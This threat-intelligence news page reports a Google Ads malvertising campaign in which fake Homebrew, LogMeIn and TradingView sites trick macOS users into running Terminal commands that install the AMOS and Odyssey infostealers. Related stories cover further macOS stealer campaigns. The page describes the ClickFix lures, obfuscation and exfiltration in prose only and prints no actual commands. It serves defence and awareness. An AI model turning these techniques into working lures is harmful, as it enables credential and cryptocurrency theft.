Malvertising Campaign Delivers AMOS and Odyssey Stealer via Fake macOS Tool Sites
A sophisticated cybercriminal campaign has been identified targeting macOS users, particularly developers, by leveraging fake download portals that impersonate trusted platforms such as Homebrew, LogMeIn, and TradingView. The attackers have registered over 85 domains that closely mimic the legitimate sites of these popular tools, using convincing branding and user interfaces to deceive visitors. These malicious domains are promoted through Google Ads, ensuring that they appear prominently in search results and increasing the likelihood that unsuspecting users will visit them. Once on the fake sites, users are instructed to copy and execute a curl command in their Terminal, which initiates the download and installation of infostealing malware. The primary payloads delivered in this campaign are AMOS (Atomic macOS Stealer) and Odyssey Stealer, both of which are capable of harvesting sensitive information such as system details, browser data, and cryptocurrency credentials from infected machines. The campaign employs advanced social engineering tactics, including clipboard manipulation and command obfuscation, to increase the success rate of infections. Researchers from Hunt.io have mapped the infrastructure supporting this operation, noting that the attackers reuse IP addresses and SSL certificates across multiple domains, indicating a persistent and well-organized effort. The infrastructure has been active for several years, with some IP addresses registered under personal names, suggesting a degree of operational continuity and experience. The campaign does not rely on exploiting software vulnerabilities but instead exploits user trust in widely used open-source and financial tools. The use of Google Ads as a distribution vector highlights the attackers' willingness to invest in paid advertising to reach their targets. The campaign's focus on the developer community is particularly concerning, as compromised developer systems could lead to broader supply chain risks. Security researchers have emphasized the importance of verifying download sources and being wary of unsolicited installation instructions, especially those involving Terminal commands. The ongoing nature of the campaign, with continuous adaptation of infrastructure and tactics, underscores the need for vigilance among macOS users. The discovery of this campaign began with public reports from independent researchers, which were then corroborated and expanded upon by threat intelligence teams. The scale and persistence of the operation suggest that it is likely to continue evolving, posing a significant threat to the macOS ecosystem. Organizations are advised to educate users about the risks of malvertising and to implement technical controls to block access to known malicious domains. The campaign demonstrates the increasing sophistication of social engineering attacks targeting macOS, a platform often perceived as less vulnerable than Windows.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
4 events from the most recent confirmed update back to the earliest known activity.
Public reporting links Odyssey to Poseidon and AMOS lineage
Subsequent coverage described Odyssey as a newer macOS stealer derived from Poseidon and AMOS, while noting that AMOS had recently gained backdoor capabilities as part of its malware-as-a-service evolution. This added technical context to the campaign's tooling and threat profile.
Researchers identify broad campaign infrastructure and malware behavior
Hunt.io and BleepingComputer reported tracking more than 85 domains tied to the operation, with some malicious sites promoted through Google Ads. The malware was observed stealing browser data, credentials, and cryptocurrency-related information and exfiltrating it to attacker-controlled servers.
ClickFix lures used to install AMOS and Odyssey on macOS
The campaign used ClickFix-style social engineering to trick users into pasting and running malicious Terminal commands, bypassing normal macOS protections. These commands installed Atomic macOS Stealer (AMOS) and the newer Odyssey stealer on victim systems.
Attackers launch fake software sites targeting macOS developers
A malware campaign began using spoofed sites for popular developer and business tools, including Homebrew, LogMeIn, and TradingView, to target macOS users with infostealers. The operation relied on convincing download portals and search visibility tactics to reach victims.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
3 references tracked. Mallory keeps watching after this page renders.
AMOS, Odyssey stealers deployed via bogus tools
scworld.com
Open sourceGoogle ads for fake Homebrew, LogMeIn sites push infostealers
bleepingcomputer.com
Open sourceOdyssey Stealer & AMOS Hit macOS Developers with Fake Homebrew Sites
hunt.io
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
AMOS Mac Malware Spreads via Fake Ads and Trojanized macOS Downloads
Researchers reported multiple campaigns distributing macOS infostealers tied to the **AMOS/AtomicStealer** ecosystem, a malware-as-a-service operation that steals credentials, browser data, cryptocurrency wallets, Apple Notes, files, and **Keychain** material from macOS Catalina and newer systems on Intel, M1, and M2 devices. Earlier reporting on related macOS stealers showed operators relying on social engineering, unsigned DMG files, and password prompts to collect sensitive data, package it into archives, and exfiltrate it to command-and-control servers, with some activity also summarized to Telegram channels. More recent campaigns used **malvertising** and fake software or troubleshooting pages to lure users into running Terminal commands that fetched an AMOS variant known as **"malext"**. Investigators said the malware used obfuscated shell commands, `osascript`, quarantine removal, anti-VM and sandbox checks, and in some cases installed persistence through a LaunchDaemon and helper scripts, while also trojanizing Ledger and Trezor applications and capturing administrator passwords. Reporting also linked AMOS delivery to fake **CleanMyMac** sites and AI-themed lures, indicating operators are rapidly rotating ad accounts and adapting infection vectors to broaden theft and remote access on macOS systems.
May 25, 2026
macOS Infostealer Campaigns Using Social Engineering and Evasion Tactics
Threat actors are escalating **macOS infostealer** activity through multiple distribution and evasion techniques aimed at harvesting sensitive user data. One campaign abuses trust in legitimate AI platforms by promoting shareable *ChatGPT* and *Grok* conversation links via **Google Ads**, luring users searching for common macOS troubleshooting help into running malicious Terminal commands using the **“ClickFix”** social-engineering pattern. Executing the provided shell commands results in installation of **Atomic macOS Stealer (AMOS)**, which steals browser credentials, crypto wallet seed phrases, **Keychain** data, and personal files before exfiltrating them to attacker-controlled infrastructure. Separately, **Odyssey Stealer** intrusions against macOS have surged globally, with notable targeting reported in the U.S., France, and Spain and additional impact across Europe, the Americas, and parts of Asia and Africa. Moonlock Lab reporting indicates Odyssey is delivered through **fake software updates, cracked tools, and fraudulent apps**, and is designed to evade detection by generating a **unique fingerprint per infection**, frequently changing code structure, and using many distinct **SHA-256** variants—suggesting automated builders are being used to produce large numbers of hard-to-block samples. Collectively, the reporting highlights sustained pressure on macOS users from credential-stealing malware that blends high-trust lures with rapid variant generation to hinder traditional defenses.
Mar 21, 2026
Infostealer Campaigns Expand to macOS and Cross-Platform Platform Abuse
Microsoft reported that infostealer operators have broadened beyond traditional Windows-focused activity to target **macOS** and mixed-platform environments through social engineering, malicious installers, and abuse of trusted services. Since late 2025, researchers observed campaigns delivering **DigitStealer**, **MacSync**, and **Atomic macOS Stealer (AMOS)** via fake software downloads, malicious `.dmg` files, and **ClickFix**-style prompts that trick users into running Terminal commands, leading to theft of browser credentials, cryptocurrency wallet data, Keychain contents, and developer secrets. The company also linked multiple cross-platform and Python-based operations to the trend, including **PXA Stealer**, attributed to Vietnamese-speaking threat actors targeting government and education organizations through phishing, persistence mechanisms, and Telegram-based exfiltration. Separate campaigns used **WhatsApp** to spread **Eternidade Stealer** with worm-like propagation and pushed a fake **Crystal PDF** installer through malvertising and SEO poisoning to capture browser sessions and credentials. Microsoft said the activity increasingly relies on fileless execution, native utilities, obfuscation, **LOLBINs**, and trusted platforms to evade detection, and published Defender XDR detections, hunting queries, indicators of compromise, and mitigation guidance.
May 25, 2026